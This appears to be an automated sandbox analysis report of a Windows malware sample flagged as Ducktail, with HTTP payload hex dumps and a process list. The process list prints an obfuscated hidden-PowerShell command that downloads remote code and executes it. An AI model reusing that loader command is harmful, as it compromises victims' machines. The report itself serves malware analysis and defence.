                                                                                  Data Ascii: JJ}ZJ;wJ*JJJ}ZJ;wJh*JJJ}ZJ;wJH*JJJ}ZJ;wJ(*JJJ}ZJ;wJ*JiJJ}ZJ;wJ*JaJJ}ZJ;wJ*JIJJk}ZJ;wJ*
                                                                                  2024-11-08 09:42:17 UTC1369INData Raw: d2 eb 48 bf 2a 02 4a 8f 07 29 0b a4 02 4a 89 02 4a 8f 0f fb 7f 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 28 bf 2a 02 4a 8f 07 21 0b a4 02 4a 89 02 4a 8f 0f 03 7c 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 08 bf 2a 02 4a 8f 07 09 0b a4 02 4a 89 02 4a 8f 0f 0b 7c 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb e8 be 2a 02 4a 8f 07 f1 0a a4 02 4a 89 02 4a 8f 0f 03 7c 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb c8 be 2a 02 4a 8f 07 d9 0a a4 02 4a 89 02 4a 8f 0f eb 7f 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb a8 be 2a 02 4a 8f 07 c1 0a a4 02 4a 89 02 4a 8f 0f e3 7f 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 88 be 2a 02 4a 8f 07 b1 0a a4 02 4a 89 02 4a 8f 0f cb 7f 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 68 be 2a 02 4a 8f 07 b1 0a a4 02 4a 89 02 4a 8f 0f f3 7f 5a 02 4a 81 3b 02 77 03 c1 4a
                                                                                  Data Ascii: H*J)JJZJ;wJ(*J!JJ|ZJ;wJ*JJJ|ZJ;wJ*JJJ|ZJ;wJ*JJJZJ;wJ*JJJZJ;wJ*JJJZJ;wJh*JJJZJ;wJ
                                                                                  2024-11-08 09:42:17 UTC1369INData Raw: 3b 02 77 03 c1 4a 89 d2 eb e8 b5 2a 02 4a 8f 07 21 04 a4 02 4a 89 02 4a 8f 0f 23 7e 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb c8 b5 2a 02 4a 8f 07 21 04 a4 02 4a 89 02 4a 8f 0f 13 7e 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb a8 b5 2a 02 4a 8f 07 11 04 a4 02 4a 89 02 4a 8f 0f fb 79 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 88 b5 2a 02 4a 8f 07 01 04 a4 02 4a 89 02 4a 8f 0f e3 79 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 68 b5 2a 02 4a 8f 07 01 04 a4 02 4a 89 02 4a 8f 0f db 79 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 48 b5 2a 02 4a 8f 07 e9 07 a4 02 4a 89 02 4a 8f 0f c3 79 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 28 b5 2a 02 4a 8f 07 d1 07 a4 02 4a 89 02 4a 8f 0f ab 79 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 08 b5 2a 02 4a 8f 07 c9 07 a4 02 4a 89 02 4a 8f 0f a3 79 5a 02 4a
                                                                                  Data Ascii: ;wJ*J!JJ#~ZJ;wJ*J!JJ~ZJ;wJ*JJJyZJ;wJ*JJJyZJ;wJh*JJJyZJ;wJH*JJJyZJ;wJ(*JJJyZJ;wJ*JJJyZJ
                                                                                  2024-11-08 09:42:17 UTC1369INData Raw: 0f d3 7a 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 88 b0 2a 02 4a 8f 07 21 07 a4 02 4a 89 02 4a 8f 0f bb 7a 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 68 b0 2a 02 4a 8f 07 11 07 a4 02 4a 89 02 4a 8f 0f a3 7a 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 48 b0 2a 02 4a 8f 07 01 07 a4 02 4a 89 02 4a 8f 0f 8b 7a 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 28 b0 2a 02 4a 8f 07 e9 06 a4 02 4a 89 02 4a 8f 0f 73 7a 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb 08 b0 2a 02 4a 8f 07 d1 06 a4 02 4a 89 02 4a 8f 0f 5b 7a 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb e8 b3 2a 02 4a 8f 07 b9 06 a4 02 4a 89 02 4a 8f 0f 43 7a 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb c8 b3 2a 02 4a 8f 07 a1 06 a4 02 4a 89 02 4a 8f 0f 2b 7a 5a 02 4a 81 3b 02 77 03 c1 4a 89 d2 eb a8 b3 2a 02 4a 8f 07 a1 06 a4 02 4a 89 02 4a
                                                                                  Data Ascii: zZJ;wJ*J!JJzZJ;wJh*JJJzZJ;wJH*JJJzZJ;wJ(*JJJszZJ;wJ*JJJ[zZJ;wJ*JJJCzZJ;wJ*JJJ+zZJ;wJ*JJJ


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  18192.168.11.2049744104.21.86.219443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:43:04 UTC76OUTGET /StaticFile/TermServiceTryRun/55 HTTP/1.1
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  2024-11-08 09:43:05 UTC1106INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:43:05 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 2183168
                                                                                  Connection: close
                                                                                  content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                  hash: BFF2365257251B6BA227A5E748DBD62E
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9bYz1Ngp9dsd%2F%2Fe11dWVQtDbq2yUg%2BtSWKTPbvzIBXFwgr3hvfTCqU%2BJNqBIYAdHs883zastSTlTEmYXh9gQbaJ0bfSfIsGNcnr0jCk46U009DY46i59BUa7RzpTC%2Bs5uUpp3r1Z7HU1"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=30363&sent=13529&recv=6838&lost=0&retrans=0&sent_bytes=18978679&recv_bytes=20758&delivery_rate=47131927&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49ddcfefc8c0b-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102717&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=714&delivery_rate=37290&cwnd=251&unsent_bytes=0&cid=2e6dd7b1512f1218&ts=814&x=0"
                                                                                  2024-11-08 09:43:05 UTC263INData Raw: 7a 6d 67 37 35 37 37 37 33 37 38 37 c8 c8 37 37 8f 37 37 37 37 37 37 37 77 37 2d 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 36 37 37 8d 27 37 39 28 83 3e fa 16 8f 36 7b fa 16 a7 a7 63 5f 5e 44 17 47 45 58 50 45 56 5a 17 5a 42 44 43 17 55 52 17 45 42 59 17 42 59 53 52 45 17 60 5e 59 04 05 3a 3d 13 00 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37
                                                                                  Data Ascii: zmg757773787777777777w7-7777777777777777777777777777777777677'79(>6{c_^DGEXPEVZZBDCUREBYBYSRE`^Y:=777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
                                                                                  2024-11-08 09:43:05 UTC1369INData Raw: 37 03 6f d9 51 37 37 37 37 37 37 37 37 d7 37 35 36 3c 36 35 2e 37 3b 39 37 37 77 24 37 37 37 37 37 4b 3a 39 37 37 27 37 37 37 07 39 37 37 37 77 37 37 27 37 37 37 35 37 37 31 37 37 37 37 37 37 37 31 37 37 37 37 37 37 37 37 07 15 37 37 33 37 37 37 37 37 37 34 37 77 b6 37 37 27 37 37 77 37 37 37 37 27 37 37 27 37 37 37 37 37 37 27 37 37 37 37 27 38 37 46 37 37 37 37 d7 39 37 33 26 37 37 37 a7 27 37 37 ab 26 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 77 38 37 3b 7c 36 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 07 38 37 2f 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 3f d4 39 37 a7 35 37 37 37 37 38 37 51 35 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 19 43 52 4f 43 37 37 37 17 d1 3a 37 37 27
                                                                                  Data Ascii: 7oQ77777777756<65.7;977w$77777K:977'7779777w77'7775771777777717777777777377777747w77'77w7777'77'777777'7777'87F7777973&777'77&777777777777777777w87;|67777777777777777777777777787/7777777777777777777?975777787Q5777777777777777777CROC777:77'
                                                                                  2024-11-08 09:43:05 UTC1369INData Raw: 45 53 75 58 58 5b 35 37 37 37 b7 c8 c8 c8 48 6f 25 77 37 32 71 56 5b 44 52 33 63 45 42 52 31 64 4e 44 43 52 5a 35 37 37 bb 25 77 37 34 3f 7b 58 59 50 75 58 58 5b 33 37 37 37 b7 c8 c8 c8 48 bf 25 77 37 32 71 56 5b 44 52 33 63 45 42 52 31 64 4e 44 43 52 5a 35 37 37 8b 25 77 37 25 31 44 43 45 5e 59 50 35 37 37 37 fb 25 77 37 3c 3d 60 5e 53 52 64 43 45 5e 59 50 35 37 37 37 d7 25 77 37 3d 3d 76 59 44 5e 64 43 45 5e 59 50 37 37 35 37 c3 25 77 37 3b 30 61 56 45 5e 56 59 43 35 37 37 33 24 77 37 3b 3d 78 5b 52 61 56 45 5e 56 59 43 35 37 37 37 2f 24 77 37 24 31 63 74 5b 56 44 44 ab 28 77 37 35 37 37 37 1b 24 77 37 36 30 7f 65 72 64 62 7b 63 33 37 37 37 b7 c8 c8 c8 48 35 37 73 24 77 37 39 32 63 70 62 7e 73 27 37 37 37 37 37 37 37 37 33 37 37 37 d3 27 77 37 37 37 37
                                                                                  Data Ascii: ESuXX[5777Ho%w72qV[DR3cEBR1dNDCRZ577%w74?{XYPuXX[3777H%w72qV[DR3cEBR1dNDCRZ577%w7%1DCE^YP5777%w7<=`^SRdCE^YP5777%w7==vYD^dCE^YP7757%w7;0aVE^VYC5773$w7;=x[RaVE^VYC5777/$w7$1ct[VDD(w75777$w760erdb{c3777H57s$w792cpb~s'777777773777'w7777
                                                                                  2024-11-08 09:43:05 UTC1369INData Raw: 2e 77 37 74 37 c3 c8 27 2d 77 37 74 37 c3 c8 0c 2d 77 37 74 37 c3 c8 53 2d 77 37 74 37 c3 c8 a7 2d 77 37 74 37 c3 c8 fb 2d 77 37 74 37 c3 c8 30 2c 77 37 74 37 c3 c8 75 2c 77 37 74 37 c3 c8 bf 2c 77 37 74 37 c3 c8 f2 2c 77 37 75 37 c3 c8 c8 2c 77 37 75 37 c3 c8 0e 2b 77 37 75 37 c3 c8 48 2b 77 37 74 37 c3 c8 8a 2b 77 37 74 37 c3 c8 d9 2b 77 37 74 37 c3 c8 16 2a 77 37 74 37 c3 c8 62 2a 77 37 7d 37 c2 c8 bf 2a 77 37 7d 37 c1 c8 84 2a 77 37 7d 37 c0 c8 d1 2a 77 37 7d 37 cf c8 76 29 77 37 7d 37 ce c8 45 29 77 37 7d 37 cd c8 94 29 77 37 7d 37 cc c8 eb 29 77 37 7d 37 cb c8 2c 28 77 37 7c 37 ca c8 71 28 77 37 7d 37 c9 c8 45 28 77 37 7a 37 c8 c8 37 37 30 63 78 55 5d 52 54 43 11 37 e7 b9 77 37 31 74 45 52 56 43 52 34 37 37 37 37 37 3f 37 36 3f ab 28 77 37 37 37 33
                                                                                  Data Ascii: .w7t7'-w7t7-w7t7S-w7t7-w7t7-w7t70,w7t7u,w7t7,w7t7,w7u7,w7u7+w7u7H+w7t7+w7t7+w7t7*w7t7b*w7}7*w7}7*w7}7*w7}7v)w7}7E)w7}7)w7}7)w7}7,(w7|7q(w7}7E(w7z7770cxU]RTC7w71tERVCR477777?76?(w7773
                                                                                  2024-11-08 09:43:05 UTC516INData Raw: 35 37 77 8f 25 77 37 36 37 36 36 35 37 35 37 03 37 0f a6 77 37 3e 62 59 5e 43 64 54 58 47 52 34 37 8f 25 77 37 3f 37 35 37 37 37 37 37 37 37 33 64 52 5b 51 35 37 77 8f 25 77 37 36 37 36 36 35 37 35 37 04 37 2b a7 77 37 31 72 46 42 56 5b 44 34 37 37 27 77 37 3f 37 35 3f ab 28 77 37 37 37 33 64 52 5b 51 35 37 3f ab 28 77 37 36 37 34 78 55 5d 35 37 35 37 1c 37 13 a7 77 37 3c 70 52 43 7f 56 44 5f 74 58 53 52 34 37 ab 27 77 37 3f 37 36 3f ab 28 77 37 37 37 33 64 52 5b 51 35 37 35 37 04 37 3b a4 77 37 3f 63 58 64 43 45 5e 59 50 34 37 8f 25 77 37 3f 37 35 3f ab 28 77 37 37 37 33 64 52 5b 51 35 37 77 8f 25 77 37 36 37 36 36 35 37 35 37 6c 37 33 a4 77 37 26 64 56 51 52 74 56 5b 5b 72 4f 54 52 47 43 5e 58 59 34 37 1f 24 77 37 3f 37 34 3f ab 28 77 37 37 37 33 64 52
                                                                                  Data Ascii: 57w%w7676657577w7>bY^CdTXGR47%w7?7577777773dR[Q57w%w7676657577+w71rFBV[D477'w7?75?(w7773dR[Q57?(w7674xU]57577w7<pRCVD_tXSR47'w7?76?(w7773dR[Q57577;w7?cXdCE^YP47%w7?75?(w7773dR[Q57w%w767665757l73w7&dVQRtV[[rOTRGC^XY47$w7?74?(w7773dR
                                                                                  2024-11-08 09:43:05 UTC1369INData Raw: 52 35 37 35 37 1c 37 db ba 77 37 3c 79 52 40 7e 59 44 43 56 59 54 52 34 37 ab 28 77 37 3f 37 36 37 37 37 37 37 37 37 33 64 52 5b 51 35 37 35 37 1b 37 33 b9 77 37 3b 71 45 52 52 7e 59 44 43 56 59 54 52 34 37 37 37 37 37 3f 37 36 3f ab 28 77 37 37 37 33 64 52 5b 51 35 37 35 37 10 37 c7 b9 77 37 30 73 52 44 43 45 58 4e 34 37 37 37 37 37 3f 37 36 3f ab 28 77 37 37 37 33 64 52 5b 51 35 37 35 37 37 37 37 97 28 77 37 30 30 63 78 55 5d 52 54 43 4b 20 77 37 37 37 37 37 37 37 31 64 4e 44 43 52 5a 37 37 37 37 35 37 37 37 37 37 2b 17 77 37 37 37 37 37 37 37 37 37 37 37 37 37 0f 17 77 37 37 37 37 37 2b 17 77 37 37 37 37 37 15 17 77 37 3f 37 37 37 13 20 77 37 2b a7 77 37 13 a7 77 37 3b a4 77 37 33 a4 77 37 13 a4 77 37 1f a4 77 37 1b a4 77 37 17 a4 77 37 db ba 77 37 33
                                                                                  Data Ascii: R57577w7<yR@~YDCVYTR47(w7?7677777773dR[Q575773w7;qERR~YDCVYTR477777?76?(w7773dR[Q57577w70sRDCEXN477777?76?(w7773dR[Q5757777(w700cxU]RTCK w77777771dNDCRZ7777577777+w7777777777777w77777+w77777w7?777 w7+w7w7;w73w7w7w7w7w7w73
                                                                                  2024-11-08 09:43:05 UTC1369INData Raw: 37 37 37 37 37 35 37 3f 03 a1 77 37 33 72 4f 5e 43 37 37 37 37 37 37 37 35 37 37 37 37 a7 13 77 37 39 3f 63 7a 58 59 5e 43 58 45 2b 37 37 37 37 37 37 37 37 30 37 37 37 ab 27 77 37 37 37 37 37 37 3d 71 7b 58 54 5c 74 58 42 59 43 3b 37 07 15 77 37 e7 b9 77 37 37 37 ab 27 77 37 33 37 37 37 37 38 71 65 52 54 42 45 44 5e 58 59 74 58 42 59 43 35 37 d3 27 77 37 3f 37 37 37 37 3a 71 78 40 59 5e 59 50 63 5f 45 52 56 53 35 37 37 26 77 37 3b 37 37 37 37 3d 71 7b 58 54 5c 72 41 52 59 43 35 37 ab 27 77 37 27 37 37 37 37 3d 71 64 47 5e 59 74 58 42 59 43 35 37 ab 14 77 37 23 37 37 37 37 3d 71 60 56 5e 43 66 42 52 42 52 35 37 1f 13 77 37 2f 37 37 37 37 3d 71 66 42 52 42 52 7b 58 54 5c 35 37 35 37 3e 37 3e 57 aa 77 37 3b 64 52 43 64 47 5e 59 74 58 42 59 43 37 37 37 37 37
                                                                                  Data Ascii: 7777757?w73rO^C777777757777w79?czXY^CXE+777777770777'w777777=q{XT\tXBYC;7w7w777'w7377778qeRTBED^XYtXBYC57'w7?7777:qx@Y^YPc_ERVS577&w7;7777=q{XT\rARYC57'w7'7777=qdG^YtXBYC57w7#7777=q`V^CfBRBR57w7/7777=qfBRBR{XT\5757>7>Ww7;dRCdG^YtXBYC77777
                                                                                  2024-11-08 09:43:05 UTC1369INData Raw: 37 37 37 37 07 1d 77 37 37 37 37 37 23 1d 77 37 37 37 37 37 2d 1d 77 37 3b 37 37 37 13 20 77 37 2b a7 77 37 13 a7 77 37 3b a4 77 37 33 a4 77 37 13 a4 77 37 1f a4 77 37 1b a4 77 37 17 a4 77 37 db ba 77 37 33 b9 77 37 c7 b9 77 37 37 37 37 37 37 37 26 63 79 58 65 52 51 74 58 42 59 43 78 55 5d 52 54 43 07 1d 77 37 30 26 63 79 58 65 52 51 74 58 42 59 43 78 55 5d 52 54 43 23 1d 77 37 ab 28 77 37 37 37 31 64 4e 44 43 52 5a 37 37 37 37 35 37 37 37 57 1d 77 37 23 3b 67 64 5f 58 45 43 64 43 45 5e 59 50 d3 26 77 37 35 37 4f 1d 77 37 3d 3d 62 63 71 0f 64 43 45 5e 59 50 de ca 35 37 bb 1d 77 37 3d 3a 65 56 40 75 4e 43 52 64 43 45 5e 59 50 c8 c8 35 37 37 93 1d 77 37 23 32 67 75 4e 43 52 83 27 77 37 35 37 37 37 37 8f 1d 77 37 23 31 67 7e 59 43 01 03 23 26 77 37 35 37 37
                                                                                  Data Ascii: 7777w77777#w77777-w7;777 w7+w7w7;w73w7w7w7w7w7w73w7w7777777&cyXeRQtXBYCxU]RTCw70&cyXeRQtXBYCxU]RTC#w7(w7771dNDCRZ77775777Ww7#;gd_XECdCE^YP&w757Ow7==bcqdCE^YP57w7=:eV@uNCRdCE^YP577w7#2guNCR'w757777w7#1g~YC#&w7577
                                                                                  2024-11-08 09:43:05 UTC1369INData Raw: 37 37 37 37 37 35 37 37 37 35 31 61 75 4e 43 52 44 35 37 37 37 37 37 37 37 37 37 35 30 65 56 40 73 56 43 56 35 37 35 37 37 37 37 67 18 77 37 34 3e 63 63 4e 47 52 7c 5e 59 53 36 37 37 37 37 21 37 37 37 7b 18 77 37 3e 43 5c 62 59 5c 59 58 40 59 3e 43 5c 7e 59 43 52 50 52 45 31 43 5c 74 5f 56 45 3a 43 5c 72 59 42 5a 52 45 56 43 5e 58 59 30 43 5c 71 5b 58 56 43 3f 43 5c 64 43 45 5e 59 50 32 43 5c 64 52 43 30 43 5c 74 5b 56 44 44 3f 43 5c 7a 52 43 5f 58 53 30 43 5c 60 74 5f 56 45 3e 43 5c 7b 64 43 45 5e 59 50 3e 43 5c 60 64 43 45 5e 59 50 3e 43 5c 61 56 45 5e 56 59 43 30 43 5c 76 45 45 56 4e 3f 43 5c 65 52 54 58 45 53 3c 43 5c 7e 59 43 52 45 51 56 54 52 30 43 5c 7e 59 43 01 03 3d 43 5c 73 4e 59 76 45 45 56 4e 3e 43 5c 62 64 43 45 5e 59 50 3d 43 5c 74 5b 56 44
                                                                                  Data Ascii: 77777577751auNCRD577777777750eV@sVCV5757777gw74>ccNGR|^YS67777!777{w7>C\bY\YX@Y>C\~YCRPRE1C\t_VE:C\rYBZREVC^XY0C\q[XVC?C\dCE^YP2C\dRC0C\t[VDD?C\zRC_XS0C\`t_VE>C\{dCE^YP>C\`dCE^YP>C\aVE^VYC0C\vEEVN?C\eRTXES<C\~YCREQVTR0C\~YC=C\sNYvEEVN>C\bdCE^YP=C\t[VD
                                                                                  2024-11-08 09:43:05 UTC1369INData Raw: 77 37 74 37 c3 c8 9e 08 77 37 74 37 c3 c8 cb 08 77 37 74 37 c3 c8 7a 77 77 37 74 37 c3 c8 a5 77 77 37 74 37 c3 c8 ef 77 77 37 74 37 c3 c8 29 76 77 37 74 37 c3 c8 53 76 77 37 74 37 c3 c8 9f 76 77 37 74 37 c3 c8 c1 76 77 37 74 37 c3 c8 1b 75 77 37 74 37 c3 c8 53 75 77 37 74 37 c3 c8 97 75 77 37 74 37 c3 c8 ec 75 77 37 74 37 c3 c8 2e 74 77 37 74 37 c3 c8 5e 74 77 37 74 37 c3 c8 9d 74 77 37 74 37 c3 c8 d1 74 77 37 74 37 c3 c8 03 73 77 37 74 37 c3 c8 45 73 77 37 74 37 c3 c8 99 73 77 37 74 37 c3 c8 34 72 77 37 74 37 c3 c8 5d 72 77 37 74 37 c3 c8 f5 72 77 37 74 37 c3 c8 20 71 77 37 74 37 c3 c8 b2 71 77 37 74 37 c3 c8 d3 71 77 37 74 37 c3 c8 77 70 77 37 74 37 c3 c8 91 70 77 37 74 37 c3 c8 29 7f 77 37 74 37 c3 c8 a6 7f 77 37 74 37 c3 c8 21 7e 77 37 74 37 c3 c8 48
                                                                                  Data Ascii: w7t7w7t7w7t7zww7t7ww7t7ww7t7)vw7t7Svw7t7vw7t7vw7t7uw7t7Suw7t7uw7t7uw7t7.tw7t7^tw7t7tw7t7tw7t7sw7t7Esw7t7sw7t74rw7t7]rw7t7rw7t7 qw7t7qw7t7qw7t7wpw7t7pw7t7)w7t7w7t7!~w7t7H


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:04:40:48
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit
                                                                                  Imagebase:0x7ff7d4800000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:04:40:48
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff72e5c0000
                                                                                  File size:875'008 bytes
                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:04:40:48
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="
                                                                                  Imagebase:0x7ff6d7f80000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Ducktail_11, Description: Yara detected Ducktail, Source: 00000002.00000002.2740483057.000001AC2023A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:04:40:48
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff72e5c0000
                                                                                  File size:875'008 bytes
                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:04:40:50
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.cmdline"
                                                                                  Imagebase:0x7ff749740000
                                                                                  File size:2'759'232 bytes
                                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:04:40:51
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES352B.tmp" "c:\Users\user\AppData\Local\Temp\vz2enilj\CSC2427E8DFE2D64B98811230F26E9EEEB4.TMP"
                                                                                  Imagebase:0x7ff778c20000
                                                                                  File size:52'744 bytes
                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:04:40:58
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                  Imagebase:0x7ff6d7f80000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:9
                                                                                  Start time:04:40:58
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff72e5c0000
                                                                                  File size:875'008 bytes
                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
